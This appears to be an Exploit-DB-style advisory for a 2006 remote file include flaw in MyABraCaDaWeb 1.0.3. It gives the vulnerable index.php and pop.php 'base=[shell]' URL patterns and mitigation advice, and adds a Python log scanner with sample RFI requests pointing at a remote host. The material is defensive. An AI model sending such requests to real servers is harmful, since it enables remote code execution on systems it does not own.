Vendor: MyABraCaDaWeb
By: ERNE
CVSS: 7.5 (HIGH)
Remote File Include Vulnerability
CWE: 98
Product Name: MyABraCaDaWeb
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: No
Related CWE: N/A
CPE: a:comscripts:myabracadaweb:1.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MyABraCaDaWeb v1.0.3 – Remote File Include Vulnerabilities

MyABraCaDaWeb v1.0.3 is vulnerable to a Remote File Include vulnerability, which allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can expose sensitive information, such as passwords, or give the attacker full control of the server. The vulnerable URLs are http://www.site.com/[path]/index.php?base=[shell] and http://www.site.com/[path]/pop.php?base=[shell].

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated. This includes any input that is used in a URL, such as the base parameter in the vulnerable URLs. Additionally, it is important to ensure that the web server is properly configured to prevent the execution of malicious scripts.
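
Because no patch exists, reviewing web server logs for requests that pass an off-host value in the base parameter of index.php or pop.php is a useful complement to the mitigation above. The following is an added example, not code from the advisory or from MyABraCaDaWeb; it assumes Apache/nginx "combined" access logs, and the log lines, addresses and host names in it are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPTS = {"index.php", "pop.php"}  # scripts named in the advisory
PARAM = "base"                      # parameter named in the advisory
# Off-host value: scheme://, data: URI, or //host; tolerate a stray leading "=".
REMOTE = re.compile(r"^[\s=]*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.I)
# Assumption: "combined" log format (client, ..., [time], "METHOD target PROTO", status).
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def decode(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded scheme is still seen."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def remote_base(target):
    """Return the decoded base value if it points off-host, else None."""
    url = urlsplit(target)
    if url.path.lower().rsplit("/", 1)[-1] not in SCRIPTS:
        return None
    for key, val in parse_qsl(url.query, keep_blank_values=True):
        val = decode(val)  # parse_qsl has already decoded once
        if key.lower() == PARAM and REMOTE.match(val):
            return val
    return None

def scan(lines):
    """Yield (client, status, base_value) for each suspicious log line."""
    for line in lines:
        m = LOG.match(line)
        if m and (hit := remote_base(m.group(3))):
            yield m.group(1), int(m.group(4)), hit

# Constructed sample log lines (documentation addresses and host names).
SAMPLE = [
    '203.0.113.5 - - [12/Mar/2006:10:01:02 +0000] "GET /app/index.php?base=includes/ HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [12/Mar/2006:10:02:11 +0000] "GET /app/pop.php?base=http://files.example/x.txt HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.9 - - [12/Mar/2006:10:02:15 +0000] "GET /app/index.php?base==%2568ttp%253A%252F%252Ffiles.example%252Fx HTTP/1.1" 500 0 "-" "-"',
    '203.0.113.5 - - [12/Mar/2006:10:03:40 +0000] "GET /app/about.php?base=http://files.example/ HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE):
        print(f"{client} status={status} base={value!r}")
```

A hit with status 200 shows only that the request was served, so correlate it with outbound connections from the web server at the same time before concluding that a remote file was included.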

Exploit-DB raw data: